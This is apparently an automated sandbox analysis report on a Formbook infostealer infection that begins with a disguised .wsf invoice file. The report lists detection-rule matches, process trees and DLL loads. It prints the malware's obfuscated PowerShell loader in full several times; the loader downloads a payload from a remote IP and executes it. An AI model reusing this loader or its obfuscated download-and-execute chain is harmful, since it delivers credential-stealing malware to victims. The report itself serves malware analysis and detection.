        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 034B5130 appears 36 times
        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 034FF290 appears 105 times
        Source: C:\Windows\SysWOW64\recover.exeCode function: String function: 0346B970 appears 266 times
        Source: CDS AC 661171855-VN1 SOA.wsfInitial sample: Strings found which are bigger than 50
        Source: amsi64_7108.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: amsi32_1364.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: 0000000A.00000002.2617970698.0000000000BD0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.3358657365.0000000003210000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.3357503748.0000000002CF0000.00000040.80000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000D.00000002.3358587624.00000000031D0000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000A.00000002.2641581781.00000000214C0000.00000040.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: 0000000C.00000002.3358866491.0000000003B80000.00000040.00000001.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Formbook_1112e116 reference_sample = 6246f3b89f0e4913abd88ae535ae3597865270f58201dc7f8ec0c87f15ff370a, os = windows, severity = x86, creation_date = 2021-06-14, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Formbook, fingerprint = b8b88451ad8c66b54e21455d835a5d435e52173c86e9b813ffab09451aff7134, id = 1112e116-dee0-4818-a41f-ca5c1c41b4b8, last_modified = 2021-08-23
        Source: Process Memory Space: powershell.exe PID: 7108, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: Process Memory Space: powershell.exe PID: 1364, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winWSF@19/8@3/4
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Roaming\Thermoswitch172.MedJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5968:120:WilError_03
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ehedxga5.unh.ps1Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7108
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=1364
        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: recover.exe, 0000000D.00000002.3357718213.0000000002EC8000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3357718213.0000000002EC5000.00000004.00000020.00020000.00000000.sdmp, recover.exe, 0000000D.00000002.3361219173.0000000007C04000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\CDS AC 661171855-VN1 SOA.wsf"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(D
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeProcess created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe"
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: unknownProcess created: C:\Windows\System32\rundll32.exe C:\Windows\System32\rundll32.exe C:\Windows\System32\shell32.dll,SHCreateLocalServerRunDll {9aa46009-3ce0-458a-a354-715610a075e6} -Embedding
        Source: unknownProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"
        Source: C:\Windows\SysWOW64\recover.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"
        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(DJump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"Jump to behavior
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\syswow64\WindowsPowerShell\v1.0\powershell.exe" "$Caked124 = 1;$Allegroernes15='S';$Allegroernes15+='ubstrin';$Allegroernes15+='g';Function unkaiserlike($Micrometeoroid){$Specialuddannelser=$Micrometeoroid.Length-$Caked124;For($Presaged=1; $Presaged -lt $Specialuddannelser; $Presaged+=(2)){$Vedic+=$Micrometeoroid.$Allegroernes15.Invoke($Presaged, $Caked124);}$Vedic;}function Hydrolyzable($Superheater){. ($Porsitets) ($Superheater);}$Alcoholmeter=unkaiserlike ',M oLzgiflDl,a,/ 5 . 0v F(,W,iKnUd o.wKsS FNSTB ,1.0,.T0,;S QWFiSna6c4 ;C Fx 6H4V; Sr.v :.1 2 1K.B0A), BGpe,cRk.oT/ 2h0 1,0 0N1 0A1D UF i r,eUfVo.x./H1 2,1S.A0, ';$Nonattribution175=unkaiserlike '.U sMe r -pA gDe.nDtb ';$Leggiest89=unkaiserlike 'Hh t t p :T/,/.8S7C.C1S2,1,. 1k0S5T.,1 6P3 / d,o m ksaPpkiBt,l e rb.fmIs iA ';$Heitiki=unkaiserlike 'T>S ';$Porsitets=unkaiserlike ' iUeLx ';$Mediaevalism='Garapato';Hydrolyzable (unkaiserlike 'RSCe,tS- CYoCnEt.e,n.t, C- P aAt.hS TP:J\ JUo.rbdMk l o,dAe,r . t.xNtC A-,V,aLl.u.eE .$,M e.dAiTa eBvSaJl.iHsNmU; ');Hydrolyzable (unkaiserlike ' i f ( t e sFt -Ap,a.t h, RTG:E\ J oNr d,k lBoFdFeDrO.,tPx.tL)F{ eGxSi t }.; ');$landingsprocedurernes = unkaiserlike ',e.cDh.o. N%,a p.p,d aotFa.% \ T hLeWrSmMoRsGwdiSt c.hM1B7 2I. MIe d, T&P&E Be.cUhFoF ,$. ';Hydrolyzable (unkaiserlike '.$.gQlCoPbpaClB:,ALl gRu mm=A( cHm dH / c $Ml,aanRdPiAn g s.p.r.oTc,eOdMuAr,eKr n,ets ) ');Hydrolyzable (unkaiserlike ' $ g lSo b a lU:LD.a t,aTmAaGsSk i n e rInNe,=N$ LSeAg,g i e,sDtf8O9E. s,pDlSi t (.$,H e iCtAi kSi,). ');$Leggiest89=$Datamaskinerne[0];Hydrolyzable (unkaiserlike ' $Gg l o b a,lK:.RJi p pHlAeSrMs.=CN e,w,-,ORb.j e cftB SDyAsmtPe mS.SN e tK.BWNe,bGC lSi eKnBtF ');Hydrolyzable (unkaiserlike 'U$IR iJp p l e rCsL.RH.e,aRd,e r sF[.$BNsoVnMabt t,rIi bAuDt iDo nF1S7d5 ]P=S$EAVl,c.o.hRo lHmSe,tHe r ');$Entertaineres=unkaiserlike 'SR iHpApWl e,rvs . DSoRwWn,l.oSa,dIFsiVl eS(a$ L e g,gCiBeSs tC8 9P,E$NL u,fKtOn iRn,gDeDr,s 1 8 5,)S ';$Entertaineres=$Algum[1]+$Entertaineres;$Luftningers185=$Algum[0];Hydrolyzable (unkaiserlike ',$ g,l.o,b,aGl :,P rLo,p a gAe r,e.nRd e =G(.TUeCs tN-,P a,t h $ LPuCfktDnSi,nGg eFr sF1T8I5L) ');while (!$Propagerende) {Hydrolyzable (unkaiserlike ' $Sgcl oDbSaFlS:.V iud.e lCyHsRtBe nQ=C$Ft,r uPei ') ;Hydrolyzable $Entertaineres;Hydrolyzable (unkaiserlike ' S.t a r tU-,Stl.eLe.pH S4 ');Hydrolyzable (unkaiserlike ',$ g lEo b.a lE:OP,rNoPp,aSgTe r.e n dEe,= (PT,e sRtF-.POa tPhV B$FL u,fTtbn i n,g eGrUsB1O8.5 )R ') ;Hydrolyzable (unkaiserlike ' $MgAl oVb aSlK: D.e.cNaTnSaUlJ=M$BgNl,oIbEaAl,:FA.lFgNoSr.iTsTtTiKcC+ +R% $ DYaSt aSmNa.sPk ivnNe rOnFe .,c,oTu.n tP ') ;$Leggiest89=$Datamaskinerne[$Decanal];}Hydrolyzable (unkaiserlike ' $Tg.lPo bsaClS:STBr aUn sFpSaSt rUoCn.iTzpe d, A=. ,GAeKt - C,oAn,t eDn tP T$TLAuNfTtFn iAn g eAr s 1J8S5 ');Hydrolyzable (unkaiserlike 'P$.gAlPoTb aOlB:FU n.laa i,df =S M[.S,yLsBt.eAm ..CUo n vRe.r.t.],: : F rBo m BGa sCe,6c4,SSt r.itnTgP(DJump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\system32\cmd.exe" /c "echo %appdata%\Thermoswitch172.Med && echo $"Jump to behavior
        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Windows Mail\wab.exe "C:\Program Files (x86)\windows mail\wab.exe"Jump to behavior
        Source: C:\Program Files (x86)\BJiWoSpcMcRjZkCvIgbbdRhowtaYFGkZsxHgGGWAItQvFgUmVzrtzxf\qdSMStVpAfAXHdDEbm.exeProcess created: C:\Windows\SysWOW64\recover.exe "C:\Windows\SysWOW64\recover.exe"Jump to behavior
        Source: C:\Windows\SysWOW64\recover.exeProcess created: C:\Program Files\Mozilla Firefox\firefox.exe "C:\Program Files\Mozilla Firefox\Firefox.exe"Jump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: version.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: uxtheme.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sxs.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: urlmon.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: iertutil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: srvcli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: netutils.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: scrobj.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wldp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msasn1.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptsp.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: rsaenh.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: cryptbase.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: msisip.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wshext.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: vbscript.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: amsi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: userenv.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: profapi.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wbemcomn.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: propsys.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.storage.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: edputil.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: sspicli.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: wintypes.dllJump to behavior
        Source: C:\Windows\System32\wscript.exeSection loaded: appresolver.dllJump to behavior
